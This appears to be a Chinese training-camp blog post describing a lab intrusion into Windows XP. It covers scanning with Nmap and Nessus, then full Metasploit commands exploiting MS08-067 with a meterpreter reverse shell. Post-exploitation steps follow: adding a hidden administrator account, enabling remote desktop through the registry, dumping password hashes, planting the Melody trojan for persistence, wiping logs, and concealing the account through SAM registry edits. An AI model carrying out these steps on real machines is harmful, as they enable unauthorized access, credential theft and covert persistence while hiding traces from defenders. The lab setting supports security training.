蓝盾实训营day5——windows主机渗透、kali-metasploit、melody木马

目录

主机渗透

环境

  • windows xp sp2 (ms08_067漏洞利用)
  • kali linux 2.0(配置好Nessus环境)

目标扫描

nmap -sn 192.168.148.1/24   //扫局域网主机
nmap -O [target-ip] //扫描特定主机

扫描完成后,可以看到目标主机开放的端口号、mac地址、操作系统。

漏洞扫描

1、开启nessus服务:

service nessusd start

2、查看服务端口:

netstat -lntp | grep ness

这里写图片描述

2、然后用浏览器访问:

必须用https前缀来访问,可以在本地连接kali的这个网页。

https://localhost:8834/

3、启动一个new scan:

这里写图片描述

配置一下只扫描windows漏洞:
这里写图片描述

4、扫描结果

这里写图片描述

这里扫描出来一些以MS开头的漏洞,MS是微软的意思,是指由微软公司发布出来的漏洞,我们下面对MS08-067漏洞进行利用。

漏洞利用

开启postgresql数据库服务和metasploit服务:

service postgresql start
service metasploit start

metasploit是著名的漏洞利用框架,集成了漏洞利用工具。

1、进入ms控制台:

msfconsole

这里写图片描述

2、查找漏洞利用方法:

msf > search ms08-067

这里写图片描述

3、使用该netapi:

use exploit/windows/smb/ms08_067_netapi

4、查看靶机连接方式:

msf > show payloads

这里写图片描述

5、设置payload为反向TCP连接,然后设置:

  • rhost 靶机地址
  • lhost 本地地址
set payload windows/meterpreter/reverse_tcp
set rhost 192.168.148.128
set lhost 192.168.148.129

show options查看该api需要配置的选项

这里写图片描述

6、选择靶机系统

show targets
set target 10

这里写图片描述

7、开始攻击:

run

这里写图片描述

遇到windows的cmd,可以设置终端的编码为gbk,这样就能显示cmd的中文了

提权

以下都是在windows shell里面操作。

  • 账号:mmq
  • 密码:123

1、添加用户

net user mmq$ 123 /add

2、添加到管理组,从users组中删除:

net localgroup administrators mmq$ /add
net localgroup uses mmq$ /del

3、远程连接

用注册表的方式开启远程桌面
开启远程桌面:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f

另外开一个终端进行远程连接:

rdesktop 192.168.148.128

这里写图片描述

hashdump可以获取windows上的账号和密码的md5:

meterpreter > hashdump

留后门

Melody木马工具
这里写图片描述

选择生成服务端,输入自己本机的ip,然后点击生成之后,会生成一个 server.exe 木马文件(第一次启动后会开机自启),想办法把木马文件放进靶机,然后启动,就可以在服务端进行控制了。

这里采用的办法是meterpreter的upload功能:
这里写图片描述

靶机日志擦除

windows下的日志位置:
这里写图片描述

隐藏账号

cmd -> regedit打开注册表,进入路径HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList

,新建个DWORD值命名为你的账号,键值设为0即可:
这里写图片描述

右键HKEY_LOCAL_MACHINE\SAM\SAM添加权限:
这里写图片描述

把Administrator的F值复制粘贴到你的账号的F值上:
这里写图片描述

导出你的账号对应在names以及users下的项为mo$.reg,user.reg:
这里写图片描述

命令行删除你的账户:

net user mo$ /del

然后双击mo$.reg,user.reg导入注册表,到此你的账户隐藏成功。

猜你喜欢

转载自blog.csdn.net/mingC0758/article/details/81025854